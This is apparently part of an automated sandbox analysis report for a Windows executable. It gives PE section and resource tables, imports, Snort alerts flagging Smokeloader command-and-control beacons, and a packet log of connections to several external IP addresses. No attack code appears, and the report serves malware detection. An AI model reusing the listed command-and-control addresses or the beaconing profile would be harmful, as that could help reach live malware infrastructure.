IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf992	0xfa00	False	0.574578125	data	6.773217121698693	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x11000	0x1e4fc	0x1b600	False	0.755921803652968	data	6.812614538183082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x30000	0x26b30	0x26c00	False	0.5955393145161291	data	5.90584051060312	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x57000	0x14e0	0x1600	False	0.41370738636363635	data	4.078155334415673	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x54fc0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_CURSOR	0x55e68	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_CURSOR	0x56738	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	Slovak	Slovakia
RT_CURSOR	0x56868	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0	Slovak	Slovakia
RT_ICON	0x30b20	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x319c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x32270	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x327d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x34d80	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x35e28	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x367b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x36c80	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x37b28	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x383d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x3a978	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x3ba20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x3bed8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x3cd80	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x3d628	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x3db90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x40138	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x411e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x41b68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x42038	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x42ee0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x43788	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x43e50	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x443b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x46960	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x47a08	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x47ed8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Slovak	Slovakia
RT_ICON	0x48d80	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Slovak	Slovakia
RT_ICON	0x49628	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Slovak	Slovakia
RT_ICON	0x49cf0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Slovak	Slovakia
RT_ICON	0x4a258	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Slovak	Slovakia
RT_ICON	0x4c800	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Slovak	Slovakia
RT_ICON	0x4d8a8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Slovak	Slovakia
RT_ICON	0x4e230	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Slovak	Slovakia
RT_ICON	0x4e710	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x4f5b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x4fe60	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x50528	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x50a90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x53038	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x540e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x54a68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ACCELERATOR	0x54f48	0x78	data	Slovak	Slovakia
RT_GROUP_CURSOR	0x56710	0x22	data	Slovak	Slovakia
RT_GROUP_CURSOR	0x56918	0x22	data	Slovak	Slovakia
RT_GROUP_ICON	0x36c18	0x68	data	Slovak	Slovakia
RT_GROUP_ICON	0x3be88	0x4c	data	Slovak	Slovakia
RT_GROUP_ICON	0x47e70	0x68	data	Slovak	Slovakia
RT_GROUP_ICON	0x41fd0	0x68	data	Slovak	Slovakia
RT_GROUP_ICON	0x4e698	0x76	data	Slovak	Slovakia
RT_GROUP_ICON	0x54ed0	0x76	data	Slovak	Slovakia
RT_VERSION	0x56940	0x1f0	MS Windows COFF PowerPC object file	Slovak	Slovakia

Imports

DLL

Import

KERNEL32.dll

DebugActiveProcess, DeleteVolumeMountPointA, EndUpdateResourceW, ReadConsoleA, GetNumberOfConsoleMouseButtons, GetComputerNameW, SetThreadExecutionState, FreeEnvironmentStringsA, GetTickCount, TlsSetValue, LoadLibraryW, GetConsoleAliasW, WriteConsoleW, LCMapStringA, InterlockedExchange, SetLastError, GetProcAddress, VirtualAlloc, ResetEvent, LoadLibraryA, GetProcessWorkingSetSize, SetConsoleDisplayMode, LockResource, SetCommMask, GetModuleHandleA, OpenFileMappingW, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, GetLastError, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, RtlUnwind, HeapSize, GetLocaleInfoA, WideCharToMultiByte, RaiseException, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, GetStringTypeA, GetStringTypeW, CloseHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, SetStdHandle, CreateFileA

USER32.dll

WindowFromDC

Possible Origin

Language of compilation system	Country where language is spoken	Map
Slovak	Slovakia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.593.112.238.8549715802851815 01/03/23-09:46:55.877154	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49715	80	192.168.2.5	93.112.238.85
192.168.2.5175.120.254.949709802851815 01/03/23-09:46:28.845991	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49709	80	192.168.2.5	175.120.254.9
192.168.2.5195.158.3.16249708802851815 01/03/23-09:46:27.109616	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49708	80	192.168.2.5	195.158.3.162
192.168.2.5175.120.254.949719802851815 01/03/23-09:46:58.922198	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49719	80	192.168.2.5	175.120.254.9

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2023 09:46:26.986928940 CET	49708	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:27.109085083 CET	80	49708	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:27.109195948 CET	49708	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:27.109616041 CET	49708	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:27.109632015 CET	49708	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:27.232065916 CET	80	49708	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:27.672688007 CET	80	49708	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:27.673171043 CET	80	49708	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:27.673271894 CET	49708	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:27.733532906 CET	49708	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:27.857680082 CET	80	49708	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:28.542877913 CET	49709	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:28.838428974 CET	80	49709	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:28.838675022 CET	49709	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:28.845990896 CET	49709	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:28.848963976 CET	49709	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:29.144529104 CET	80	49709	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:30.059654951 CET	80	49709	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:30.059716940 CET	80	49709	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:30.059798002 CET	49709	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:30.059798002 CET	49709	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:30.209362030 CET	49710	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:30.355072975 CET	80	49709	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:30.476968050 CET	80	49710	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:30.477078915 CET	49710	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:30.477191925 CET	49710	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:30.477214098 CET	49710	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:30.744719028 CET	80	49710	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:31.671641111 CET	80	49710	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:31.671706915 CET	80	49710	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:31.671793938 CET	49710	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:31.671884060 CET	49710	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:31.686537027 CET	49711	80	192.168.2.5	181.215.246.89
Jan 3, 2023 09:46:31.939560890 CET	80	49710	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:34.878679037 CET	49711	80	192.168.2.5	181.215.246.89
Jan 3, 2023 09:46:40.879264116 CET	49711	80	192.168.2.5	181.215.246.89
Jan 3, 2023 09:46:52.918148994 CET	49713	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:46:53.177174091 CET	80	49713	211.171.233.126	192.168.2.5
Jan 3, 2023 09:46:53.177369118 CET	49713	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:46:53.185036898 CET	49713	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:46:53.185298920 CET	49713	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:46:53.444119930 CET	80	49713	211.171.233.126	192.168.2.5
Jan 3, 2023 09:46:54.494102955 CET	80	49713	211.171.233.126	192.168.2.5
Jan 3, 2023 09:46:54.494132042 CET	80	49713	211.171.233.126	192.168.2.5
Jan 3, 2023 09:46:54.494235992 CET	49713	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:46:54.497417927 CET	49713	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:46:54.543066025 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.543164968 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.543268919 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.544676065 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.544749975 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.622322083 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.622535944 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.625771046 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.625824928 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.626204014 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.645924091 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.645975113 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.684156895 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.684191942 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.684357882 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.684387922 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.712980032 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.713195086 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.713231087 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.715115070 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.715281010 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.715307951 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.715359926 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.715461969 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.715475082 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.741317034 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.741465092 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.741501093 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.742868900 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.743000031 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.743019104 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.743051052 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.743104935 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.744016886 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.744169950 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.744194031 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.744214058 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.744218111 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.744353056 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.744381905 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.744493961 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.744527102 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.744642973 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.744668007 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.744693041 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.744808912 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.744828939 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.756067038 CET	80	49713	211.171.233.126	192.168.2.5
Jan 3, 2023 09:46:54.770081997 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.770199060 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.770344973 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.770428896 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.770461082 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.772053957 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.772231102 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.772267103 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.772325993 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.772433996 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.772454023 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.773294926 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.773436069 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.773458958 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.773587942 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.773715019 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.773736000 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.773916006 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.774034977 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.774055004 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.774374008 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.774501085 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.774524927 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.774750948 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.774890900 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.774914980 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.775176048 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.775302887 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.775330067 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.775438070 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.775553942 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.775573969 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.799036026 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.799230099 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.799267054 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.799395084 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.799474001 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.799488068 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.799652100 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.799732924 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.799743891 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.799846888 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.799912930 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.799923897 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.800081968 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.800159931 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.800169945 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.800375938 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.800503016 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.800513983 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.801069975 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.801179886 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.801196098 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.801325083 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.801403999 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.801414967 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.801561117 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.801640987 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.801652908 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.801789999 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.801886082 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.801898956 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.804305077 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.804431915 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.804452896 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.804522038 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.804847002 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.804908991 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.805073023 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.805213928 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.805250883 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.805521965 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.805686951 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.805689096 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.805716038 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.805821896 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.805850029 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.805917025 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.805946112 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.805972099 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806047916 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.806113958 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806142092 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.806165934 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806245089 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.806288958 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806333065 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.806355000 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806436062 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.806485891 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806529999 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.806552887 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806644917 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.806658983 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806850910 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806870937 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.806900024 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.806976080 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.807065964 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.807090044 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.807121992 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.807239056 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.807264090 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.807353973 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.807459116 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.807487011 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.811197996 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.811248064 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.811362982 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.811777115 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.828732967 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.828896999 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.828915119 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.828938007 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.828991890 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.829046011 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.829062939 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.829168081 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.829277039 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.829296112 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.829485893 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.829569101 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.829591036 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.830144882 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.830246925 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.830271006 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.830455065 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.830540895 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.830562115 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.830837965 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.830934048 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.830954075 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.831110001 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.831183910 CET	49714	443	192.168.2.5	5.135.247.111
